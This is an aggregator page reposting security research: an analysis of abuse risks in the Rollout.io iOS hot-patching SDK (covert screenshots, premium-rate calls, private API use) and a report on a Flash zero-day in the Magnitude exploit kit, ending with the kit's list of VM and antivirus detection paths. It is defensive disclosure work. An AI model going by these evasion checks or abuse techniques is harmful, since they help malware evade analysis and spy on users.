Quantcast
Channel: Kristen Dennesen – Security Bloggers Network
Viewing all 138 articles
Browse latest View live

Rollout or Not: the Benefits and Risks of iOS Remote Hot Patching

$
0
0
Previously On iOS Remote Hot Patching

Apple’s detailed app review process has resulted in greater security for iOS apps made available through the App Store. However, this review process can be lengthy, which negatively impacts developers who need to quickly patch a buggy or insecure app. As a result, we have seen the development of various third-party solutions that allow developers to remotely hot patch an iOS app on a non-jailbroken device without going through Apple’s review process. While iOS remote hot patching is a very recent concept and is still in its inception, we have seen fierce demand and an emerging market for such products. However, they are not without their own security risks.

In our January blog, we discussed JSPatch, an open source hot patching solution. While JSPatch allows developers to provide better support to users by quickly fixing problematic apps, it potentially allows malicious actors to engage in attacks that evade current iOS security controls.

In this episode, we take you on a tour of Rollout.io, a commercial (though currently with limited free access) solution that attempts to address the remote patching problem with an eye towards security.

Episode 2: Rollout.io

According to their website, Rollout is an Israel-based, venture capital-backed technology startup founded in 2014. The core product is a commercialized solution to the iOS patching problem that essentially allows developers to update their app’s behavior, following an app’s initial approval and release, without going through Apple’s App Store review process.

Co-founder Erez Rusovsky stated that Rollout “created an SDK that allows you to remotely hot-patch native production applications”.  Rollout’s mission statement further states that:

Rollout.io’s mission is to bridge the gap between developers and their live apps. When a live app needs updating, app developers usually wait days and even weeks to get the new version out to their users. Rollout solves this problem by giving developers code-level access to their live apps.

Rollout is aware of the concerns within the community that patching apps outside of the App Store could be a violation of Apple’s review guidelines and practices. Rollout notes both on their FAQ site and in a longer blog post that their process is in compliance.

Technical Wonderland

JSPatch, which we discussed in our previous blog, provides a relatively simple patching framework consisting of three Objective-C files to be imported to an iOS app to activate the remote hot patching capability. As a commercial offering, Rollout offers a software development kit (SDK) and infrastructure that supports patching for scale and efficiency. Rollout provides a simple overview of their process, but also gives us an insider look into the tech stack and the “under the hood” mechanics of their Rollout SDK through their technical blogs. For our analysis, we focus only on the dissection of the Rollout SDK.

In a nutshell, Rollout SDK is built on the following three technologies:

●    dSYM file
●    Method Swizzling
●    JavaScriptCore framework

iOS Debug Symbol File

According to Rollout, the following steps are taken for an app to hook up with Rollout:
The developer chooses to use Rollout SDK and imports the SDK into their app.
The Rollout SDK parses the app code and generates the dSYM file (debug symbol file), which is uploaded to Rollout’s back end.
The dSYM file is rendered in the developer portal and available to the app developer for use in reviewing and patching an app.

The end result is rendered by Rollout’s developer portal and presented to the developers, allowing them to select and patch a function. Through the Rollout portal, the developer has easy access to all the defined classes (e.g. ViewController) and selectors (e.g., imagePickerController:didFinishPickingMediaWithInfo:) of the analyzed app, as shown in Figure 1.


 
Figure 1: Rollout developer portal allowing the developer easy access to all defined classes and methods in the app

The most common way to patch a bug in an existing function is to replace the faulty implementation of the function with a new, fixed one. But there are situations where a fix is needed in multiple places across the application. In this case, the best practice is to create a new function that encapsulates the shared routine. In Rollout, one can easily achieve this through the interface shown in Figure 2.



Figure 2: Rollout developer portal allowing the developer to add a new method into a class

Rollout also allows developers to resolve problematic situations such as when a method was renamed but still called from some code in the UI, which requires the developer to link the disconnect by a new wrapper method. In this case, selecting a function to be fixed (such as [ViewController imagePickerController:didFinishPickingMediaWithInfo:] shown in Figure 2) will display the JavaScript patch editing interface shown in Figure 3.

 
Figure 3: Rollout develop portal providing a JavaScript editing interface for patch development

Method Swizzling

Method swizzling is known to iOS developers as “black magic.” In short, method swizzling is an Objective-C runtime technique that allows one implementation of a method to replace an existing implementation of another method (of a class or instance) at runtime.

The term “implementation” refers to the actual function pointer to the code (implementation) of the method. The Objective-C runtime maintains a struct called "objc_method" for each method of a class. This struct has the method name, the argument, the return types of the method, and the "implementation" of the method, which is represented by a pointer IMP pointing to a C function. Therefore, swizzling basically involves exchanging the value of the "implementation" field between the objc_method data of two different methods. Figure 4 and Figure 5 depict a visualization of the process:
 
Figure 4: The original selector and its implementation mapping in class FortitudeViewController before swizzling
   
Figure 5: The selector and implementation mapping in class FortitudeViewController after method swizzling

In Figure 4, which shows the state before swizzling, each selector in Class FortitudeViewController contains a corresponding pointer IMP that points to its real implementation, which is a C function behind the scene. For instance, selector1 is an objc_method struct that contains pointer IMP1.

The “magic” lies in the availability of three essential C functions in the Objective-C runtime:

●    method_exchangeImplementations
●    class_replaceMethod
●    method_setImplementation

The most common and intuitive way to perform a method swizzling is similar to what is shown in Figure 6.
 

Figure 6: Example code showing method swizzling

This code will turn the internal runtime relation of the relevant methods into the conceptual structure shown in Figure 5. This effectively allows one to replace an existing implementation of a function with a new one, thus leading to a new and uncharted behavior of an app at runtime.

There have been many discussions about the pitfalls and dangers of utilizing this “black magic.” A primary focus is to avoid the unintended side effects of using the C function method_exchangeImplementations (shown above) by instead using class_replaceMethod and method_setImplementation. Further details are beyond the scope of this blog post.

Apple does not seem to have provided any official documentation for the concept of method swizzling, despite documenting the associated runtime APIs. However, it is a general consensus within the developer community that method swizzling is permitted. It should be noted that to date, Apple does not appear to have rejected an app during its review process due to the use of method swizzling.

JavaScriptCore.framework

The JavaScriptCore framework was introduced into iOS at version 7. It allows one to evaluate JavaScript programs from within a C-based program. It also lets users insert custom objects to the JavaScript environment. On iOS, it is similar to an Objective-C wrapper of WebKit’s JavaScript engine, thus extending the capability and power of scripting beyond a web client to the whole app.

The following four classes form the cornerstone of the framework:  

●    JSVirtualMachine represents the virtual JavaScript runtime environment that allows JavaScript to run and to be executed. To initiate a virtual machine instance in Objective-C, one does the following:
JSVirtualMachine *vm = [[JSVirtualMachine alloc] init];

●    JSContext talks to the above runtime, provides access to global objects that reside in the context, and performs the execution of JavaScript code. For example, in Objective-C, one can initiate a JSContext instance and declare a variable in the manner shown here:
JSContext *context = [[JSContext alloc] initWithVirtualMachine:vm];
context[@”name”] = @”Jean-Luc”;
context[@”organization”] = @”Enterprise”;

●    JSValue is the class that represents arbitrary data in JavaScript. For instance, we have:
JSValue *name = context[@”name”];
JSValue *organization = context[@“organization”];
NSLog(@”Captain Name: %@ \nOrganization: %@”, name, organization);

●    JSExport is a protocol that allows one to expose parts of Objective-C classes and methods to JavaScript. The wrapper created through this protocol functions as a passthrough between the Objective-C runtime and the JavaScript runtime. This one object thus facilitates the sharing between the two execution contexts allowing code in one environment to change the states of the other.

Rollout Patch Capability

Rollout exposes to developers only a limited set of JavaScript APIs that can be permitted in the Objective-C runtime environment. Its API documentation shows the following essentials:

●    R: the Rollout namespace object that allows integration with the Rollout SDK, the containing function, and the application’s runtime. Within which, it offers the functionality of the Foundation C function NSClassFromString, as shown in Figure 7.

Figure 7: Portion of Rollout 'R' namespace


●    ObjcBox: encapsulates Objective-C NSObject instances. It allows a transformation from an Objective-C instance to a JavaScript value. There are two important functions, as shown in Figure 8:
 
Figure 8: Portion of Rollout ObjcBox namespace

The APIs provided by Rollout and the legitimate use cases they describe for their hot patching infrastructure are simple, limited, and benign. However, as with many well-intentioned solutions, the possibilities of misuse or abuse remain when malicious individuals think outside the box.

The Usual Suspects

In our blog on JSPatch, we outlined several attack capabilities that could be carried out against that technology, such as loading arbitrary public or private frameworks into an app. The types of capabilities we described for JSPatch also work against Rollout, though we do not provide specific examples here. Instead, we highlight a few additional scenarios specific to Rollout to avoid duplication.

Example 1: Load arbitrary private frameworks and utilize unauthorized private APIs

●    Targeted private framework: /System/Library/PrivateFrameworks/CoreRecents.framework
●    Targeted private API: [[CRRecentContactLibrary defaultInstance] maxDateEventsPerRecentContact]

Figure 9 and Figure 10 show sample exploitation code and the associated console output loading the private framework CoreRecents.framework.
 
Figure 9: Sample exploitation code for loading a private framework

Console Output:


Figure 10: Sample console output showing successful load of the framework

Both this example and the following ones make use of Apple iOS private APIs. The pros and cons of the use of these private APIs by third party apps has been at the center of much debate. In general, common sense suggests that the use of Apple’s private APIs by third party apps is risky due to security risks as well as stability concerns (for example, unexpected behavior if Apple changes the internals of the private APIs). Despite Apple’s efforts to prohibit the practice of utilizing non-public APIs, it has proven difficult to identify their use when developers use obfuscation and other even more clever and sophisticated maneuvers.

That said, when an app developer with malicious intent makes use of these private APIs, the use of the APIs will leave traces within the app code itself. This means the malicious code within the app is subject to potential discovery by Apple or a third party. However, with Rollout’s dynamic hot patching process, the intent – that is, the malicious code – can be separated from the app binary itself in the form of a hot patch. Rollout, as a remote hot patching solution, is not the only means one can resort to separating private API calls from the app binary, but it lowers the bar for malware developers to achieve so.

Example 2: Load arbitrary public frameworks and utilize unauthorized private APIs

●    Targeted public framework: /System/Library/Frameworks/AVFoundation.framework
●    Targeted private API: [AVCaptureDevice devices]

Figure 11 and Figure 12 show sample code used to successfully access the iPhone’s cameras and microphone.    

Figure 11: Example exploit code loading public framework to access the private AVCaptureDevice API

Console outputs three devices: Back Camera; Front Camera; iPhone Microphone.


Figure 12: Console output showing access to the iPhone cameras and microphone

Example 3: Test device for the presence of a targeted app

The ability for one app to check for the presence of another app raises both privacy and security concerns (for example, checking for the presence of an app in order to exploit it). The primary method for obtaining a list of installed apps is through the private API [LSApplicationWorkspace allInstalledApplications]. As we have seen, use of these private APIs is prohibited by Apple’s Developer Program License Agreement.

Some app developers have sought other means to determine installed apps without using Apple’s private APIs. For example, iHasApp used the public API [UIApplication canOpenURL:] to identify installed apps based on their supported URL schemes. Unfortunately, the extensive usage of the API and associated detection method in a large volume of apps resulted in iHasApp and its derived framework being shut down by Apple, and the API being flagged during the app store vetting process.

However, Rollout eliminates this constraint because the API can be called via a hot patch outside of the app itself.

Figure 13 and Figure 14 show sample code using canOpenURL: to detect installed apps.
Figure 13: Sample exploit code calling canOpenUrl
 
Figure 14: Console output showing app detection

Example 4: Make phone calls to premium numbers without consent

By utilizing the public API [UIApplication openURL:], one can launch the native mobile phone app and make a phone call to an arbitrary premium number. This activity would be immediately visible to the user when the phone app interface was unexpectedly displayed. However, use of the exploit could be fine-tuned by applying environmental checks (for example, only initiate calls when the user is asleep) and maintaining a status of long running background process through background modes.  

Figure 15 and Figure 16 show sample code for dialing a premium number and the successful connection.    

Figure 15: Sample exploit code used to dial a premium phone number

 
Figure 16: Console output showing successful call

Example 5: Take screenshot without informing the user

Figure 17, Figure 18, and Figure 19 show that through the patch, one can take screenshots of the current foreground screen by utilizing non-public API [UIImage createSnapshotWithRect:] without the user’s knowledge. The screenshots are saved in the sandbox of the application, which can be further exflitrated outside of the device.


Figure 17: Sample exploit code showing the use of private API [UIImage createSnapshotWithRect:] to capture the screen



 
Figure 18: Console output showing that the captured screenshot has been saved to the sandbox
 
Figure 19: App sandbox content showing the captured images

All of the above tests were performed on a device that runs iOS 8.4. Apple has released a number of iOS versions through the years to fix and close security holes reported by both industry practitioners and academic researchers. Most of the private or public APIs that could have been abused are protected through various access controls  (e.g., entitlements to the Address Book) in newer versions of iOS. However, the reality is that there are a significant number of users who are not keeping their devices’ OS version up-to-date. The ramifications are that “old” attacks through private APIs, which are ineffective against iOS 8.4 or iOS 9, would still be effective against some devices.

Threat Scenario

In our earlier blog on JSPatch, we highlighted three general attack scenarios using an iOS remote hot-patching vector. Of these, two are still present on Rollout in a similar fashion:

1.    Precondition: 1) Embedded 3rd party ad SDK is malicious.
a.    Consequences: ad SDK has the right to write to the database, which allows it to change the behavior of the app.
2.    Precondition: 1) App developer is malicious.
a.    Consequences: app developers can perform stealthy persistent but temporary actions against the user including by utilizing Private APIs.

It has been pointed out that an app developer with malicious intent will strive to find a way to distribute their malicious app regardless of the particular framework used. That is, no existing distribution method can fully guard against malicious intent. While we agree with this statement, we also believe it is important to understand how different distribution methods may help or hinder a malicious developer in deploying their malicious code. A developer wishing to distribute a malicious app through the App Store would need to slip the malicious code past the review process. The third-party hot patching frameworks developed to date do not include any review process, so it helps to understand how malicious patches could be distributed and where (or whether) they could be detected.

A risk of hot patching frameworks is that because patches can be deployed ‘on the fly’, a developer could distribute a legitimate app, temporarily deploy a patch to carry out specific malicious activity, and then deploy another patch to revert the app back to its normal, non-malicious behavior. Because this activity can occur automatically in the background, users are highly unlikely to notice the change, and replacement of the malicious patch with a “clean” one could leave little evidence that anything suspicious had occurred.

To put the threat scenario in perspective, we provide a visualization of such an attack to reinforce the concept and facilitate understanding.  

Fictional Malicious Plotting

Synopsis
Our fictional app FortitudeSeries was a new release of an iOS app that allows one to add filters to selected photos from the device photo gallery and save the edited photos back to the gallery. In order to offer the user a better experience with quality performance and stable software, we decided to use the Rollout.io service to maintain the ability to remotely hot-patch bugs and security issues should they be discovered in the future.

After testing several patches, we identified several actions we could take outside of what the app was originally designed for. We first tried saving an original copy of all the filtered photos in the sandbox, and it was a quick success. We then became curious about the photos the user does not select for filtering, so we issued a new patch to capture a screenshot of the user’s photo gallery. This too was simple to achieve.


Production
Our fictional attack is demonstrated through three stages to show the following scenarios:

●    Stage 1: Rollout patching is disabled in the backend. FortitudeSeries only exhibits its legitimate behavior. A user selects a photo from the photo gallery by pressing the button “Select A Photo”. Once the photo is selected, the console outputs “Filtering the selected image” and the photo gallery view is dismissed. The app’s Documents directory does not hold any data, therefore, it remains empty. Figure 20 shows the source code of the main view controller of FortitudeSeries.
 

Figure 20: Objective-C code for the core implementation of fictional app FortitudeSeries

●    Stage 2: Rollout patch is enabled with the code shown in Figure 21. The user restarts the app and performs the same sequence of actions. The app’s Documents directory keeps a record of the selected photos and labels them with the timestamp of the photo that was selected.
  

Figure 21: Rollout patch code for saving a copy of the user selected photo in the sandbox

●    Stage 3: Rollout patch is enabled with different code, as shown in Figure 22. The user restarts the app and performs the same sequence of actions described above. The app takes a screenshot of the photo gallery and saves a copy to the sandbox Documents directory using the same naming scheme presented above.
 

Figure 22: Rollout patch code for capturing a screenshot of the photo gallery in stealth

Once the data is in the sandbox of the app, the app may deal with it however it wants. A conceivable approach is to exfiltrate it to a developer-controlled server. It should not be surprising that this can be done via a Rollout patch script that executes at runtime without Apple’s knowledge.  

The operation of the demo is therefore done in the following three stages:

●    Stage 1: Develop FortitudeSeries in Objective C and Rollout; deploy it to a user device to allow the user filter selected photos; check the Rollout patch; perform the expected actions on the installed app; check the console log; check the sandbox Documents directory;
●    Stage 2: Enable Rollout patch with script for scenario I; restart the app; perform the expected actions on the installed app; check the console log; check the sandbox Documents directory;
●    Stage 3: Comment out the patch script for scenario I and enable script for scenario II; restart the app; perform the expected actions on the installed app; check the console log; check the sandbox Documents directory.

Primed with the above depiction, it should be easy to understand the recorded demo below even without a narrative.

Rollout Security Defense

The chances of a successful man-in-the-middle (MITM) attack through the use of poor encryption (or no encryption) of the patch script content can be reduced significantly through secure implementation of the app and any supporting hot patching framework.

To prevent patches from being tampered with, Rollout invested in the following security measures:

●    The app retrieves the patch data from Rollout.io server through HTTPS. This significantly lowers the chances of being a target of MITM attacks.
●    The patch data is signed by a Rollout.io private key and therefore can only be decrypted by a key that’s known to the iOS app.

Security Weakness

The above protection ensures that data is secure in transmission. However, once the patch data lands on the device, it is decrypted accordingly and stored in the sandbox in plaintext. Figure 23 shows the directory #APP_SANDBOX/Library/Caches/#APP_ID containing a specific database Cache.db that contains data resulting from the hot patch network communications.
 

Figure 23: File structure view of the directory encompasses the database of patch data

All patches that have been pushed to production and received by the client app are stored as a record in the table cfurl_cach_receiver_data as shown in Figure 24.
 

Figure 24: DB table cfurl_cach_receiver_data containing all records of production patches

Each patch is stored in the receiver_data column in JSON format. The JavaScript code is mapped to the key “configuration” in based64 format. For example, the highlighted data blob in Figure 24 contains the based64 encoded content shown in Table 1:


Table 1: base64 content from patch database

Its corresponding ASCII format is the data is shown in Figure 25.

Figure 25: Decoded base64 content

Given Rollout’s existing security measures such as HTTPS and asymmetric encryption, as well as iOS’s sandbox, this weakness is a minor issue. Since there are other attack vectors that can be more easily exploited (for example those described in our threat scenario I and II), a third party library may be less motivated to tamper the patch to their advantage. Should circumstances change and one chooses to do, this weakness is really to be leveraged.

Field Survey

Rollout’s web site states that its product is “trusted by thousands of mobile app developers”. As Rollout provides a solution for a problem that is unique to iOS developers, we can speculate that all its customers are iOS app developers at this point. Though a few have been highlighted on their main page, the exact number of App Store-approved apps that use Rollout SDK is unknown. We performed a scan using FireEye’s infrastructure in late 2015 and found 130 apps that have been or still are in the App Store using Rollout as a remote hot patching solution. This number has since grown to 245 as of Jan. 19, 2016.  

As opposed to apps that adopted JSPatch as the remote hot patching solution, which are predominantly Chinese apps for Chinese speaking users, apps that use Rollout are mostly marketed towards English speaking users. Many offer localization for a variety of languages. There are no distinct features among these apps; they span a variety of categories including education, social networking, magazines and newspapers, lifestyle, photo and video, games and more. Most of the apps have very low user adoption in the App Store at this point. The most popular app seems to have accumulated a download record of 62,869 times, while the vast majority have no popularity rating on file.  

At the time of this writing, we have not confirmed any malicious activity related to any app that uses the Rollout SDK. We are simply reporting on potential vulnerabilities and avenues for misconduct that could potentially be exploited when using this tool. 

Epilogue

Conclusions

iOS remote hot-patching through a non-Objective-C language to effectively evade the Apple review process – a process that has so far largely led to a safe and clean app ecosystem – is now a reality. Our analysis has placed JSPatch and Rollout under the spotlight as examples of two hot patching frameworks with very different characteristics:

  • JSPatch is developed by a Chinese developer; Rollout.io is provided by an Israel-based company.
  • JSPatch is open sourced; Rollout.io is a commercial product.
  • JSPatch is adopted mostly by Chinese app developers; Rollout.io is marketed to English speaking or international developers.
  • JSPatch and Rollout.io offer different syntax and capabilities for JavaScript code.
  • The infrastructures are far from the same.

Despite differences in their implementation, both are similar in that they potentially allow a developer to turn an innocuous looking app into something malicious – all while circumventing Apple’s App Store vetting process. What’s more, the underlying “biology” is the same for the two solutions: the combination of JavaScriptCore framework and method swizzling.

When conducting our research, we contacted Rollout regarding the issues described in this post. We gratefully acknowledge Rollout’s responsiveness and assistance in addressing them. As a result, Rollout has indicated that they will prevent developers from accessing iOS private APIs and private frameworks in their future releases of the product so that all patch code is subject to the same types of checks as those in the Apple review process. With Rollout’s upcoming release, the attack examples shown here would be thwarted.

Additional Food for Thought

The current limitations of the App Store review process and the desire from developers for a faster solution means that hot patching, as a process, is unlikely to go away any time soon. We hope that by describing these underlying risks, patch framework developers will institute additional security controls to ensure that they are providing developers with convenience and productivity in iOS app development all while maintaining a clean and safe ecosystem.

In this ecosystem, iOS users are the least able to protect themselves and, consequently, the most vulnerable. When it comes to user security, it is difficult to decide which single stakeholder should assume the responsibility of maintaining and sustaining a safe and clean iOS mobile environment. While Apple has come a long way in keeping its mobile users safe from malware, the task has become increasingly difficult. It is not outrageous to expect third party library or framework providers to offer extra security to ensure their services are not being abused.

While we do not have a definite solution for this complicated issue, we believe a system that functions as follows could potentially increase iOS user security: 1) App developers providing to Apple a list of the third party libraries and frameworks that they use, 2) The underlying technologies of third party libraries and frameworks being provided to Apple, and 3) Third party library or framework providers improving security to ensure their services are used as intended.

 


CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit

$
0
0

On April 2, security researcher @Kafeine at Proofpoint discovered a change to the Magnitude Exploit Kit. Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).

While version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.

Exploit Delivery Chain

Magnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen’s dimensions and color depth (Figure 1).

Figure 1. JS of Profile Gate

The server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.

Figure 2. JS of redirecting to main exploit page

In our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).

Figure 3. JS of loading exploits

The Flash Exploit

A memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker’s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit’s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.

Figure 4. ActionScript of Flash exploits

Conclusion

This is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications – such as Internet Explorer/Edge and Flash Player – change the game.

Despite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as EMET from Microsoft.

Click here for the security bulletin issued by Adobe.

Acknowledgements

A huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.

Appendix

res://Program%20Files%20(x86)Fiddler2Fiddler.exe/#3/#32512
res://Program%20FilesFiddler2Fiddler.exe/#3/#32512
res://Program%20Files%20(x86)VMwareVMware ToolsTPAutoConnSvc.exe/#2/#26567
res://Program%20FilesVMwareVMware ToolsTPAutoConnSvc.exe/#2/#26567
res://Program%20Files%20(x86)VMwareVMware ToolsTPAutoConnSvc.exe/#2/#30996
res://Program%20FilesVMwareVMware ToolsTPAutoConnSvc.exe/#2/#30996
res://Program%20Files%20(x86)OracleVirtualBox Guest Additionsuninst.exe/#2/#110
res://Program%20FilesOracleVirtualBox Guest Additionsuninst.exe/#2/#110
res://Program%20Files%20(x86)ParallelsParallels ToolsApplicationssetup_nativelook.exe/#2/#204
res://Program%20FilesParallelsParallels ToolsApplicationssetup_nativelook.exe/#2/#204
res://Program%20Files%20(x86)Malwarebytes Anti-Malwarembamext.dll/#2/202
res://Program%20FilesMalwarebytes Anti-Malwarembamext.dll/#2/202
res://Program%20Files%20(x86)Malwarebytes Anti-Malwareunins000.exe/#2/DISKIMAGE
res://Program%20FilesMalwarebytes Anti-Malwareunins000.exe/#2/DISKIMAGE
res://Program%20Files%20(x86)Malwarebytes Anti-Exploitmbae.exe/#2/200
res://Program%20FilesMalwarebytes Anti-Exploitmbae.exe/#2/200
res://Program%20Files%20(x86)Malwarebytes Anti-Exploitmbae.exe/#2/201
res://Program%20FilesMalwarebytes Anti-Exploitmbae.exe/#2/201
res://Program%20Files%20(x86)Malwarebytes Anti-Exploitunins000.exe/#2/DISKIMAGE
res://Program%20FilesMalwarebytes Anti-Exploitunins000.exe/#2/DISKIMAGE
res://Program%20Files%20(x86)Trend MicroTitaniumTmConfig.dll/#2/#30994
res://Program%20FilesTrend MicroTitaniumTmConfig.dll/#2/#30994
res://Program%20Files%20(x86)Trend MicroTitaniumTmSystemChecking.dll/#2/#30994
res://Program%20FilesTrend MicroTitaniumTmSystemChecking.dll/#2/#30994
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 6.0 for Windows Workstationsshellex.dll/#2/#102
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 6.0 for Windows Workstationsshellex.dll/#2/#102
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 6.0shellex.dll/#2/#102
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 6.0shellex.dll/#2/#102
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 7.0shellex.dll/#2/#102
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 7.0shellex.dll/#2/#102
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 2009mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 2009mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 2010mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 2010mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 2011avzkrnl.dll/#2/BBALL
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 2011avzkrnl.dll/#2/BBALL
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 2012x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 2012x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 2013x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 2013x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 14.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 14.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 15.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 15.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 15.0.1x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 15.0.1x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 15.0.2x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 15.0.2x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Anti-Virus 16.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Anti-Virus 16.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 6.0shellex.dll/#2/#102
res://Program%20FilesKaspersky LabKaspersky Internet Security 6.0shellex.dll/#2/#102
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 7.0shellex.dll/#2/#102
res://Program%20FilesKaspersky LabKaspersky Internet Security 7.0shellex.dll/#2/#102
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 2009mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 2009mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 2010mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 2010mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 2011avzkrnl.dll/#2/BBALL
res://Program%20FilesKaspersky LabKaspersky Internet Security 2011avzkrnl.dll/#2/BBALL
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 2012x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 2012x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 2013x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 2013x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 14.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 14.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 15.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 15.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 15.0.1x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 15.0.1x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 16.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 16.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Internet Security 15.0.2x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Internet Security 15.0.2x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Total Security 14.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Total Security 14.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Total Security 15.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Total Security 15.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Total Security 15.0.1x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Total Security 15.0.1x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Total Security 15.0.2x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Total Security 15.0.2x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky Total Security 16.0.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky Total Security 16.0.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky PURE 2.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky PURE 2.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky PURE 3.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky PURE 3.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky CRYSTAL 3.0x86mfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky CRYSTAL 3.0x86mfc42.dll/#2/#26567
res://Program%20Files%20(x86)Kaspersky LabKaspersky PUREmfc42.dll/#2/#26567
res://Program%20FilesKaspersky LabKaspersky PUREmfc42.dll/#2/#26567

MULTIGRAIN – Point of Sale Attackers Make an Unhealthy Addition to the Pantry

$
0
0

